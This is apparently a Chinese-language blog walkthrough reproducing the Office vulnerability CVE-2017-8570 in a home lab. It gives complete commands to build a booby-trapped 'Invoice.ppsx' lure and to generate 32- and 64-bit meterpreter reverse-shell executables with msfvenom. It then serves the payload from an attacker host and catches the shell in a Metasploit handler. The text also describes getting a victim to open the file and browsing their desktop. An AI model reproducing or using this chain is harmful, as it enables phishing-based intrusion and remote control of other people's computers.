Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
复现环境:
攻击机:系统:kallinux 32位 IP:192.168.1.194 metasploit
目标机:系统:window7旗舰版 IP:192.168.1.133 Microsoft Office 2013
1、生成恶意文件:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.194/logo.doc
1、这里的IP是攻击机IP
2、Invoice.ppsx为生成的恶意文件
3、这里可能会报一个错误:
IOError: [Errno 2] No such file or directory: 'template/template.ppsx'
这里郁闷了很久,各种查资料,才知道这里是文件中的一个路径有问题!
在文件cve-2017-8570_toolkit.py中有一个文件路径需要修改:
修改后为此文件(template.ppsx)所在路径:
如我现在的文件为/root/Office8570-master/文件夹下,所以修改成:
接下来执行第一步生成恶意文件命令就不会报错了!
生成的恶意文件:
2、生成反弹shell文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.194 LPORT=6666 -f exe > shell.exe
设置反弹shell的ip192.168.1.194,和监听端口6666
命令执行成功:
生成的shell文件
当然了,如果目标机是64位机器那么需要执行不一样的命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell64.exe
命令执行成功
生成shell64文件
3、监听会话(来自ppsx执行反弹shell)
执行命令(32位目标机):
python cve-2017-8570_toolkit.py -M exp -e http://192.168.1.194/shell.exe -l shell.exe
过脚本在80端口监听,等待接收ppsx请求并下载执行的反弹木马
命令执行成功监听服务启动:
接下来进入Metasploit,新建一个Kali 192.168.1.194的连接,设置相关参数,接受返回的Shell:
Msfconsole
msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.1.194
msf > set LPORT 6666
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit
同样,这里攻击64位操作系统的时候,需执行如下命令(这里我没有执行):
msf > set pauload windows/x64/meterpreter/reverse_tcp
4、漏洞执行
最后将我们生成好的恶意文件发送给目标机,并让目标机打开文件。我这里是kalinux运行在虚拟机中,所以讲恶意文件直接拖到win7中,然后执行文件就行了。
文件运行(如果将文件发给别人,必须要让别人打开此文件,否则不可成功,另外图没有截好T_T)
Shell反弹显示get到了目标机
然后再meterpreter中可以直接执行ls命令,如下:
可见win7桌面上的文件:
我们还可以直接执行shell命令,那么就可以直接执行win7下的DOS命令了: